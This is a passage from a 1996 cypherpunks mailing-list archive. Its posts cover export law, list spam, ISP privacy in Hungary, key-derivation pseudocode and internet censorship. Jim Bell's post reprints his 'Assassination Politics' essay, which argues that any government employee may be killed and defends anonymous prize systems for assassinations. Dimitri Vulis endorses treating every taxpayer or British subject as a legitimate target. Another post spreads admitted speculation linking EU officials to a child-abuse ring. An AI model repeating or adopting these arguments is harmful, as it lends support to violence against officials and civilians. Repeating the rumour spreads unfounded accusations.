something Congress can't do, like write an unconstitutional law.

(Which is not to say that I agree with the inclusion of crypto on the list,
or even the idea of "export controls", but I've seen the argument that
"ITAR is not a real law so none of this matters" float across the list a
few times and it's not realistic. Whether or not a given individual likes
the idea of administrative rulemaking, it's clear that the courts and the
government think that it's real, and will put people in jail for violating
administrative regs.) 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 25 Sep 1996 16:07:05 +0800
To: cypherpunks@toad.com
Subject: Re: Banning annoying users
In-Reply-To: <Pine.SUN.3.91.960924114623.13326A-100000@beast.brainlink.com>
Message-ID: <Pine.LNX.3.95.960924155747.491C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Ray Arachelian wrote:

> This is wonderful in theory -- and in practice up until now, but what 
> happens when someone decides "Oh, I hate this list and Tim, let me write 
> a spam bot to anonymously spam the this into oblivion?"  There is such a 
> thing as denial of service via spamming.  It's quite easy to do for 
> someone who knows how to run sendmail and knows how to write a shell 
> script or a small program.  Hell, I could write one of those in less than 
> 1 minute.
> 
> As for me being banned, I doubt it, I'm not posting daily Tim warnings 
> and such spams.  yeah, banning someone off the list for their political 
> or even crypto views is silly.  Banning someone for spamming is another 
> issue.
> 
> There is no reason we can't allow posts from those who are not subscribed 
> to the list.  There's also no reason that we can't have someone moderate 
> those posts before they make it to the list to remove the spams - mind 
> you not to moderate the contents, but to remove repeating annoying spam 
> and advertisement.

This scheme would not allow people using anonymous remailers to post to the
list.  If you let posts through anonymous remailers through, then the refusal
to allow anyone not subscribed to post becomes meaningless.  Spam can be
prevented by looking for a large number of messages delivered at about the same
time.  There's no need to involve a moderator.

Mark
-- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 25 Sep 1996 09:43:11 +0800
To: cypherpunks@toad.com
Subject: ISPs' information on users
Message-ID: <v03007801ae6df29ec7c8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rodney@pop3.pn.com
Mime-Version: 1.0
Date: Tue, 24 Sep 1996 08:57:01 -0400
To: dcsb@ai.mit.edu
From: Rodney Thayer <rodney@sabletech.com>
Subject: ISPs' information on users
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Rodney Thayer <rodney@sabletech.com>

Something to think about before any of us start selling Ketchup on-line via
E-cash...

>Date: Sun, 22 Sep 1996 23:53:02 -0400
>From: darius@world.std.com (Darius Thabit)
>Subject: ISPs' information on users

>Date: Sun, 22 Sep 1996 01:18:59 -0700 (PDT)
>From: Phil Agre <pagre@weber.ucsd.edu>
>
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>This message was forwarded through the Red Rock Eater News Service (RRE).
>Send any replies to the original author, listed in the From: field below.
>You are welcome to send the message along to others but please do not use
>the "redirect" command.  For information on RRE, including instructions
>for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>Date: Fri, 20 Sep 1996 19:16:19 +0200
>From: steve@isys.hu (Steven Carlson)
>To: hungary-online-announce@hungary.yak.net
>Subject: (HOL-A) It's a Brave Old World
>
>  ------------------------------
>  Brave Old World:
>  Reflections on Europe in the Digital Age
>  by Steven Carlson; 20 Sep 1996
>  ------------------------------
>
>  ** So Much Fuss About A Bottle Of Ketchup
>
>  Hungarian police recently sent a fax around to the local Internet
>  service providers (ISPs) asking them to provide lists of their users
>  in Esztergom, a small town outside of Budapest. It seems somebody
>  had planted a bomb in a bottle of ketchup. Since everyone knows you
>  can download bomb-making instructions from the Internet, the police
>  figured they should investigate the local users. No, I'm not making
>  this up.
>
>  What's more, nearly every local ISP gave the police this information.
>  Fortunately my company has no users in Esztergom and so that's what we
>  told the police. We got off lucky. Believe me, as much as might want
>  to make a stand for privacy of information my company is NOT eager to
>  do battle with the Hungarian authorities.
>
>  But that's what it might take. Because if the Hungarian police really
>  understood the Internet they could have asked for even more. For
>  example, it would only take a few keystrokes to forward a users' mail
>  to the authorities. The police might also have asked for old email,
>  since many ISPs back this up routinely.
>
>  But that's not all. Some ISPs run caching servers, machines that store
>  frequently-viewed webpages so that users access them locally rather
>  than across the net. An ISP's caching server could give the police a
>  profile of what web pages the users have been browsing.
>
>  I'm not trying to scare anyone. My point is that sharing information
>  on the Internet is a two-way street. Computers keep extensive records.
>  Using the Internet often means you leave a trail behind you. This is
>  part of life in the digital age.
>
>  This "electronic trail" is not unique to the Internet. Every time you
>  use a credit card you create a record in several computers. Other
>  computers may be storing information about you such as your medical
>  history, driving record, tax filings and so on. The more we rely on
>  computers to manage our affairs, the more information that may be "out
>  there." This means citizens in the digital age should know their
>  rights.
>
>  Many governments already have laws to protect private information. For
>  example, the US has many laws restricting access to sensitive
>  information such as medical and credit records. You might be surprised
>  to know Hungary passed a law in 1991 to prevent misuse of information
>  associated with the national identity card.
>
>  Yet the growth of new technologies is outpacing legislation. For
>  example, Holland and other countries are experimenting with "smart
>  road" systems that can identify the licence number of a moving car for
>  purposes of toll collection. Cellular phones and satellite navigation
>  systems can report the locations of their users. It's not difficult to
>  imagine how these and other technologies could be abused.
>
>  Of course, now you know that even your local Internet provider has
>  access to some rather sensitive information about you. This leads me
>  to ask: what sort of service is your Internet provider actually
>  offering?
>
>  When it comes down to it, your ISP is like your doctor, your lawyer,
>  your accountant or your psychiatrist. Each of these professionals
>  deals with your data; each profession is governed by a code of ethics,
>  written or implicit. Moreover these limits are codified in law. If
>  your accountant allowed your competitors to read the company books,
>  you could take him to court.
>
>  Similarly, your Internet provider has an implicit duty to protect the
>  privacy of your communication. Most professionals in my industry
>  recognize this. I know most of the people working in Hungarian
>  Internet and I doubt very much that they are reading your mail or
>  mine. But they don't know where they stand in the eyes of the law.
>
>  Internet professionals should certainly assist the police in a
>  legitimate investigation. But should every Internet user in Esztergom
>  be investigated just because they could (theoretically) find
>  bomb-making information on the Internet?
>
>  To hammer that point home a local Internet-based magazine has
>  published, in Hungarian, complete bomb-making instructions:
>  <http://www.idg.hu/internetto/cyber/special/dinamit.htm>. In other
>  words, if you've read this far you may be the subject of a future
>  investigation. Have a nice day!
>
>
>
>  ** Further Links:
>
>  The Electronic Frontier Foundation
>  <http://www.eff.org>
>  The International Electronic Rights Server
>  <http://www.privacy.org>
>  The Electronic Privacy Information Center
>  <http://www.epic.org>
>
>  ----------------------------------------------------
>  Copyright (c) 1996. Permission granted to redistribute this article in
>  electronic form for non-profit purposes only. My byline and this message
>  must remain intact. Contact me <steve@isys.hu> for reprint rights.
>-----------------------------------------------------
>
>
>
>
>

--- from Rodney Thayer <rodney@sabletech.com> +1 617 332 7292 ---

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Wed, 25 Sep 1996 08:40:24 +0800
To: cypherpunks@toad.com
Subject: Re: provably hard PK cryptosystems
In-Reply-To: <3247E194.3F54BC7E@systemics.com>
Message-ID: <Pine.SOL.3.93.960924160945.5373A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Gary Howland wrote:

> I fail to see *any* (non educational) use for these DNA "computers", let
> alone a cryptographic use - sure, they may be massively parallel, but
> what's the big deal?  I can now perform a calculation a million times
> faster than I could yesterday? (something I personally doubt, but will
> agree to for sake of the argument).  I could get the same results
> writing a cycle stealing Internet java app, so what's all the fuss
> about?

It sounds to me like your argument abstracts thusly:

"Personally, I fail to see the point to the development of more powerful
computers, since I can always steal time from other people's current
technology computers."

One could make this statement about _all_ advances in processor
technology. And it boils down to this: you're not paying for it, so you
don't see the point in getting more bang for the buck. People who are
paying for it, and have neither the inclination nor the ability to steal,  
do see the point of getting more bang for the buck. And eventually even
you'll benefit, when you find yourself writing a java applet to freeload
processor time on someone else's DNA computer. Meanwhile, processor
technology will have advanced because many people went out and paid for
faster (Intel/PowerPC/PowerDNA/Whatever) CPU's. Not because you freeloaded
off of someone else. 

> --
> pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
> Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06
> 

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649           "Pinky, your brain waves are giving The Amazing    
                        Kreskin a pounding headache."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 25 Sep 1996 16:31:43 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
Message-ID: <199609242325.QAA10957@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:19 PM 9/24/96 -0400, Simon Spero wrote:
>On Tue, 24 Sep 1996, attila wrote:
>
>> 
>>         go back to your beloved England and your labour unions
>			your roots are showing :-) ----^
>
>>         NO, I will not outright reject Jim Bell's "Assassination
>> Politics."
>
>Assasination politics is  impossible to defend from a classical 
>Liberal/Libertarian position. Bell advocates arbitrary applications of 
>violence and coercion without restriction. There is no way to justify the 
>initiation of force without abandoning any pretence of being a 
>Libertarian (which, to be fair, Bell doesn't claim to be).

You're wrong on at least three counts:  I absolutely do claim to be a 
libertarian, for one.  Secondly, while I advocate a system which I call AP, 
I do not "advocate" the MISUSE of that system for the act of attacking 
people who have no initiated force or fraud.  On the other hand, to be 
intellectually honest I can't exclude the possibility that this will happen, 
any more than a libertarian who advocates a free society  deny that somebody 
might abuse the freedoms of that society by initiating force.  There is no 
contradiction here, except in the mind of a person who believes that people 
can't be given any freedoms it is possible for them to misuse. 

It's clear you haven't read AP part 7.  Here it is; maybe you'll learn 
something from it.

1.  I defend AP from a classical liberal/libertarian position.

2.  I don't advocate arbitrary applications of violence and coercion without restriction.

3.  I only _advocate_ responding to force/fraud with force.



"Assassination Politics" Part 7, by Jim Bell

Dear libertarian Friend,

I very much understand the concerns you voiced about my idea which I call, 
"Assassination Politics," because this essay is nothing if it 
is not radical and extreme.  I wrote it, in the middle of last year, partly 
because I think libertarianism and libertarians in particular need to 
address what is, if not a "contradiction," is at least an intolerable 
reality:  On the one hand, we are told not to initiate agression, but on the 
other we are agressed against by the government every time it collects a tax.  

I much appreciate the way some people I know have "dropped out" of the 
system, and the guts that such a tactic requires.  But that's the problem, I 
think:  Only those with the "guts" do it, which gives the government fewer targets so 
that it can spend more time attacking the few who oppose it.  The reality is 
that the government STILL collects taxes, and it STILL uses that money to 
violate our rights.  We all know that's wrong.

My position is quite simple:  If tax collection constitutes agression, then 
anyone doing it or assisting in the effort or benefitting from the proceeds 
thereof is a criminal.  This is quite analogous to current law which 
prosecutes co-conspirators.  While I am not holding out "current law" as 
some sort of gold-standard of reasonableness that we must always accept, on 
the other hand I think it's plausible to use it to show that once we have 
come to the conclusion that taxation is theft, the prescription follows 
directly by a form of reasoning allegedly acceptable to society: It is 
reasonable to "attack the attackers" and their co-conspirators, and everyone 
who is employed by the government is thus a co-conspirator, even if he is 
not directly involved in the collection of those taxes.  That's because he 
IS involved in _benefitting_ from the proceeds of these taxes, and he 
presumably provides a certain level of "backup" to the young thugs that 
governmental organizations often hire.


I realize, and you should too, that the "non-agression principle" says nothing about 
the EXTENT of the self-defense/retaliation that one might reasonably employ 
in defending one's own rights:  In a sense, that sounds like an omission 
because it at least suggests that a person might "unreasonably" defend 
himself with lethal force when far less drastic means might normally be 
called for.  For what it's worth, I think most people will behave 
responsibly.   But I think it is pretty straightforward to argue that whatever 
means are necessary to stop the attack, are reasonable given the terms of 
the non-agression principle:  If a given means are known to be inadequate to 
actually stop the attack, then further and more serious means are reasonable 
and called-for.

To set up a reasonable analogy, if I'm walking down the canonical "dark 
alley" and am accosted by a man wielding a knife threatening me with it, it 
is presumably reasonable for me to pull a gun and threaten back, or possibly 
take the encounter to the final conclusion of gunfire.  Even if I should 
choose to hold my fire and test to determine whether my actions deterred 
him, I can't see that this possibility binds me morally.  And should he 
advance, despite the gun, as if to attack, I should feel no remorse in 
shooting him and taking myself out of danger.  If you accept the premises so 
far, you apparently accept the principle that escalation of the 
self-defense/retaliation is reasonable as long as if the current level of 
returned counter-threat is inadequate to stop the agression initiated by the other 
party.  To believe otherwise is to believe that ultimately,  you are 
obligated to accept a certain high level of agression simply because you do 
not have the resources (yet) to resist it.  I totally reject this concept, 
as I hope you would.

So if, hypothetically, I could have an anonymous conversation with a 
hard-nosed government employee, and asked him, "If I killed one of your 
agents, would you stop trying to collect that tax from me," his predictable 
reaction would be, "no, we would continue to try to collect that tax."  In 
fact, he would probably hasten to add that he would try to have me 
prosecuted for murder, as well!  If I were to ask if killing ten agents 
would stop them, again they would presumably say that this would not change 
their actions.

The conclusion is, to me, obvious:  Clearly, there is no practical limit to 
the amount of self-defense that I would need to protect my assets from the 
government tax collector, and to actually stop the theft, so I suggest that 
logic requires that I be morally and ethically allowed (under libertarian 
principles) to use whatever level of self-defense I choose.

You raised another objection, that quite frankly I believe is invalid.  I 
believe you implied that until a specific level of escalation is reached ( 
such as the Feds showing up on your doorstep, etc) then it is not legitimate 
to defend oneself.  Delicately, I must disagree.  As we all well know, 
government ultimately operates primarily not on actual, applied force, but 
simply the threat of future force if you do not comply.  True, there are 
people who have decided to call the government's bluff and simply drop out, 
but the reality is that this is not practical for most individuals today. 
This is no accident:  The government makes it difficult to drop out, because 
they extort the cooperation of banks and potential employers and others with 
which you would otherwise be able to freely contract.   In any case, I fail 
to see how not "dropping out" makes one somehow morally obligated to pay a 
tax (or tolerate the collection of one).   I trust you did not inadvertently 
mean to suggest this.

The reason, morally, we are entitled to shoot the mugger if he waves the 
knife in our face is that he has threatened us with harm, in this case to 
our lives, but the threat the government represents to the average citizen 
(loss of one's entire assets) is just as real, albeit somewhat different.  
Since government is a past reality, and a present reality, and has the 
immediate prospects of being a future reality as well, I sincerely believe 
that the average citizen can legitimately consider himself CONTINUOUSLY 
threatened.  The agression has already occurred, in continuously occurring, 
and has every prospect of continuing to occur.  If anything would justify 
fighting back, this would.

To continue the analogy, if you've been repeatedly mugged by the same guy 
down the same dark alley for each day of last month, that DOES NOT mean that 
you've somehow consented to the situation, or that your rights to your 
assets have somehow been waived.  With my "Assassination Politics" essay, I 
simply proposed tht we (as libertarians as well as being ordinary citizens) 
begin to treat agression by government as being essentially equivalent to 
agression by muggers, rapists, robbers, and murderers, and view their acts 
as a continuing series of agressions.  Seen this way, it should not be 
necessary to wait for their NEXT agression; they will have always have been 
agressing and they will always BE agressing, again and again, until they are 
stopped for good.

At that point, the question shifted to one of practicality:  Sure, 
theoretically we might morally have the "right" to protect ourselves with 
lethal force, but if they have any reputation at all, government agents have 
a habit of showing up in large numbers when they actually apply direct 
force.  To take a position that you can only defend yourself when _they've_  
chosen the "where" and "when" of the confrontration is downright suicidal, 
and I hope you understand that I would consider any such restriction to be 
highly unfair and totally impractical.  Understand, too, that the reason 
we're still stuck under the thumb of the government is that to the extent 
it's true, "we've" been playing by THEIR rules, not by our own.  By our own 
rules, THEY are the agressors and we should be able to treat them 
accordingly, on our own terms, at our own convenience, whenever we choose, 
especially when we feel the odds are on our side.

I understand, obviously, that the "no initiation of agression" principle is 
still valid, but please recognize that I simply don't consider it to be a 
valid counter-argument to "Assassination Politics," at least as applied to 
targets who happen to be government agents.  They've "pre-agressed," and I 
don't see any limit to the defenses I should be able to muster to stop that 
agression completely and permanently.  Not that I don't see a difference 
between different levels of guilt:  I fully recognize that some of them are 
far worse than others, and I would certainly not treat a lowly Forest 
Service grunt in the same fashion as an ATF sniper.

Now, there is one more thing that I would hope we could get straight:  As I 
originally "invented" this system, it occurred to me that there could be 
certain arguments that it needed to be "regulated" somehow;  "unworthy" 
targets shouldn't be killed, etc.  The "problem" is, what I've "invented" 
may (as I now believe it to be) actually a "discovery," in a sense:  I now 
believe this kind of system was always inevitable, merely waiting for the 
triad of the Internet, digital cash, and good encryption in order to provide 
the technical underpinnings for the entire system.  If that is genuinely the 
case, then there is no real way to control it, except by free-market 
principles.  

It would be impossible, for example, to set up some sort of 
"Assassination Politics Dictator," who decides who will live and who will 
die, because competition in the system will always rise to supply every 
demand, albeit at possibly a very high price.  And if you believe the maxim 
that "absolute power corrupts absolutely," you wouldn't want to accept any 
form of centralized control (even, perhaps, that of your own!), because any 
such control would eventually be corrupted.  Most rational people recognize 
this, and I do too.  I would not have invented a system where "Jim 
Bell" gets to make "all the decisions."  Quite the contrary, the system I've 
described absolutely prevents such centralization.  That, quite frankly, is 
the novelty and dare I say it, the beauty of this idea.  I believe that it 
simply cannot be hijacked by centralized political control.

As I pointed out in the essay, if _I_ were running one of the organizations 
accepting those donations and offering those prizes, I would selectively 
list only those targets who I am genuinely satisfied are guilty of the 
violation of the "non-agression principle."  But as a practical matter, 
there is no way that I could stop a DIFFERENT organization from being set up 
and operating under DIFFERENT moral and ethical principles, especially if it operated 
anonymously, as I antipate the "Assassination Politics"-type  systems will 
be.   Thus, I'm forced to accept the reality that I can't dictate a 
"strongly limited" system that would "guarantee" no "unjustified" deaths:  I 
can merely control my little piece of the earth and not assist in the abuse 
of others.  I genuinely believe, however, that the operation of this system 
would be a vast improvement over the status quo.

This, I argue, is somewhat analogous to an argument that we should be 
entitled to own firearms, despite the fact that SOME people will use them 
wrongly/immorally/illegally.  The ownership is a right even though it may 
ultimately allow or enable an abuse that you consider wrong and punishable.  
I consider the truth of such an argument to be obvious and correct, and I 
know you would too.

I realize that this lacks the crisp certitude of safety which would be 
reassuring to the average, "pre-libertarian" individual.  But you are not 
the "average individual" and I trust that as long-time libertarians  you 
will recognize rights must exist even given the hypothetical possibility 
that somebody may eventually abuse them. 

I do not know whether I "invented" or "discovered" this system; perhaps it's 
a little of both. I do genuinely believe that this system, or one like it, 
is as close to being technologically inevitable as was the invention of 
firearms once the material we now know as "gunpowder" was invented.  I think 
it's on the way, regardless of what we do to stop it.  Perhaps more than 
anyone else on the face of this planet, this notion has filled me, 
sequentially and then simultaneously, with awe, astonishment, joy, terror, 
and finally, relief.

Awe, that a system could be produced by a handful of people that 
would rid the world of the scourge of war, nuclear weapons, governments, and 
taxes.  Astonishment, at my realization that once started, it would cover 
the entire globe inexorably, erasing dictatorships both fascistic and 
communistic, monarchies, and even so-called "democracies," which as a 
general rule today are really just the facade of government by the special 
interests.  Joy, that it would eliminate all war, and force the dismantling 
not only of all nuclear weapons, but also all militaries, making them not 
merely redundant but also considered universally dangerous, leaving their 
"owners" no choice but to dismantle them, and in fact no reason to KEEP them!

Terror, too, because this system may just change almost EVERYTHING how we 
think about our current society, and even more for myself personally, the 
knowledge that there may some day be a large body of wealthy people who are 
thrown off their current positions of control of the world's governments, 
and the very-real possibility that they may look for a "villain" to blame 
for their downfall.  They will find one, in me, and at that time they will 
have the money and (thanks to me, at least partially) the means to see their 
revenge.  But I would not have published this essay if I had been unwilling 
to accept the risk.

Finally, relief.  Maybe I'm a bit premature to say it, but I'm satisfied we 
_will_ be free.  I'm convinced there is no alternative.  It may feel like a 
roller-coaster ride on the way there, but as of today I think our 
destination is certain.  Please understand, we _will_ be free.

Your libertarian friend,

Jim Bell


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Sep 1996 19:09:40 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: More proposals for European censorship
In-Reply-To: <Pine.HPP.3.91.960923180823.12499A-100000@cor.sos.sll.se>
Message-ID: <32487022.21FA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:
> On Mon, 23 Sep 1996, Peter Trei wrote:
> > > It's probably no coincidence that the recently busted, utter
> > > horrible child-molesting ring, with obvious protection from
> > > various persons in the establishment, was centered in Belgium -
> > > that's where the EU bureaucrat nomenklatura play their power games 
> > > and go to bordellos.

> > What exactly are you suggesting when you say 'it's probably no
> > coincidence?" I can't quite figure it out.

> Obviously not only the arrested killer used the schoolgirls chained
> in underground cells. They were for hire. High officials used his
> 'services', then ordered the police to cover it up. Why else would
> some ten policemen be arrested? The EU bureaucrats are served by
> hordes of prostitutes. Surely there are pedophiles among the hordes.
> Probably some EU pedophiles have a connection to the gang. I don't
> know this of course, but speculation is cheap.

If you want some actual names (remember, for entertainment purposes 
only!), check out a new book from Flatland called Trance Formation of 
America, about sex slaves et al.  Truly hideous stuff!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 25 Sep 1996 07:35:00 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: Transforming variable-length to fixed keys
In-Reply-To: <84345225525232@cs26.cs.auckland.ac.nz>
Message-ID: <199609241547.QAA00089@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Guttmann <pgut001@cs.auckland.ac.nz> writes on cpunks:
> I posted this to sci.crypt recently but the response to it was rather
> underwhelming, so I thought I'd repost it here to see if anyone has any
> comments on it.  What it is is a scheme for transforming arbitrary user keys
> (typically a long passphrase) into a fixed-length key for a particular
> algorithm.  This has the following properties:

> 1. The user key 'userKey' is transformed into an algorithm-specific key 'key'
>    using a number of 'iterations' of a hash algorithm 'hash()'.
>
> 2. The transformation is strongly serialized so that any form of attack
>    involving parallelization or precomputation isn't possible.

If the speed of your key generation is an issue, you could do
something like:

   key[] = { 0 };
   const int nhashes = 4;
   typedef void (*hashfnptr)(byte*, byte*, int);
	/* array of hash functions */
   hashfnptr hash[ nhashes ] = { md5, sha1, haval, ... };

   state = hash[ 0 ]( algorithm, mode, parameters, userKey );

   for count = 1 to iterations
      for length = 1 to keyLength (in hash_output_size blocks)
		/* selecting a hash function based on the state */
         state = hash[ state % nhashes ]( state );
         key[ length ] = hash[ state % nhashes]( state, userKey );

This provides more expense in hardware for the same expense in
software, so for the same CPU time you get more hardware expense, and
could reduce the iterations for the same security.

`nhashes' determined by the number of digest algorithms you consider
trustworthy.

(They need hardware for `nhashes' different digest algorithms).

You need to do something about resolving the differing output and
state sizes.

Probably speed isn't an issue though.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 25 Sep 1996 16:40:39 +0800
To: DMiskell@envirolink.org
Subject: Re: Banning annoying users
In-Reply-To: <199609241158.HAA27269@envirolink.org>
Message-ID: <199609241609.RAA00235@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



> The not allowing unsubscribed individuals to post is logical, for a
> time.  

This isn't practical for the reason that many people who read and post
to the list are not subscribed to the list.  (There are many gateways,
local mail->news gateways, etc.  eg point your nntp aware news
reader at nntp.hks.net.)

Either delete the junk, or subscribe to a filtered list if deleting or
not reading posts bothers you enough that you think it worth the risk
that the filter owner filters a few posts that you would have found
interesting.  

(killfiling on address is not possible for remailer, and content of
unattributed unsigned anonymous posts is difficult to automatically
filter).

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Sep 1996 11:18:47 +0800
To: cypherpunks@toad.com
Subject: Re: AP
In-Reply-To: <9609241952.aa26911@salmon.maths.tcd.ie>
Message-ID: <si4RuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Bell <dbell@maths.tcd.ie> writes:

> In message <6XJquD10w165w@bwalk.dm.com>, "Dr.Dimitri Vulis KOTM" writes:
> >There is no such thing as an "ordinary citizen". When the U.S. commits
> >war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere
> >every American taxpayer is an accomplice and a fair game. Likewise, any
> >Britih subject is fair game for IRA's self-defense against centuries of
> >British genocide and oppression.
> 
> 	An odd attitude to take - personally, I only hold people responsible
> for what they did, not what their government did. In Dimitri's scenario,
> the IRA could justify killing any British citizen for the British government'
> actions - even if that citizen _supported_ the IRA or agreed with its aims. 

Yes, I do.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 25 Sep 1996 16:47:45 +0800
To: pjb@ny.ubs.com
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <199609241328.JAA12601@sherry.ny.ubs.com>
Message-ID: <199609241621.RAA00240@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Paul <pjb@ny.ubs.com> writes:
> i was under the impression that germany's goal was to stop the distribution
> of radikal 154 by xs4all, not by 50 mirror sites.  they seem to have 
> accomplished their goal. do you really think that they will let a little
> thing like reason stand in their way when claiming victory?

They lost: it is still available.  If they went after another mirror
the number of mirrors would double :-)

Someone in the German press needs to rub their noses in the fact that
they lost, say by printing a list of URLS, or just mentioning the
number of mirrors, and the different countries they are located in.

The need to translate the quote:

	`The internet sees censorship as damage, and routes around it'

and put that in big letters.

Any German net freelance journalists reading?

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Wed, 25 Sep 1996 16:51:52 +0800
To: cypherpunks@toad.com
Subject: Anonymous Mail at US Post
Message-ID: <32488092.4B8B2A3A@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know if anyone else has seen this, but I was mailing letters
in the "out front" boxes the other day when I noticed a sign.  The sign
said that all packages 16 ounces or over had to be taken inside for
disposal into the mail slot. The obvious explanation being that even
though you can abstain from marking a return address, the postal
inspectors would like a nice photo of you with your mail.

Greg Kucharo
sophi@best.com
 "If you want facts, buy an almanac"
	-The Daily Iowan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 19:15:01 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
Message-ID: <ae6e3206000210046fde@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:40 AM 9/25/96, Jay Gairson wrote:
>First off, what does this have to do with cryptography?  or anything
>cypher for that matter?

Nothing, but Dmitri has "different" standards of what is list-relevant than
many of us do.

>So, basically your saying, since my parents cannot afford to pay for a
>private school for me, we are genetically inferior to those who can?
>Because hate tell ya, but I've ran into some major idiots that go to
>private schools.  Also to consider that from the school I go to, last
>year we had two perfect sat scores (no problems missed).

A minor point: An 800 SAT or Achievement score does _not_ mean "no problems
missed." There is some threshold for the percentage of right answers, which
varies from year to year and from test to test, above which the score is
marked "800." Don't ask me why they do this. (*)

This should give you more hope and more determination to get a few 800s
when you take the exams.

(* Back in 1969 when I was taking these exams and was more neurotically
interested in such things, I surmised that the 800 top end was set up to
correspond to the IQ = 160 top end reported on some major IQ tests of the
time. While some IQ tests are open-ended, resulting in, for example, the
dubious claim that Marilyn vos Savant has an IQ of 210 or somesuch, it's
more common for tests to have an upper limit, beyond which the results are
considered essentially meaningless. So, if one notes that 800 + 800 = 1600,
which is exactly 10 times 160, and that the "percentiles" for SAT combined
scores of 1500, 1400, 1300, etc. match up with the percentiles for IQs of
150, 140, 130, etc., it's pretty clear what was done with the SAT scoring
model. Obviously, many imperfections, some implicit in the nature of tests,
some in the whole nature of "IQ" per se. This is why Mensa, which takes
(alleged) IQs of 130, also accepts SAT combined scores in that general
range (x10, of course). Of course, as Roger Gregory puts it, "Mensa is the
scum of the cream of the crop.")

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <gt4436c@prism.gatech.edu>
Date: Wed, 25 Sep 1996 13:25:14 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: WHO IS MAKING A MOCKERY OF WHOM?
Message-ID: <3.0b19.32.19960924175545.009af9c0@50h97.res.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


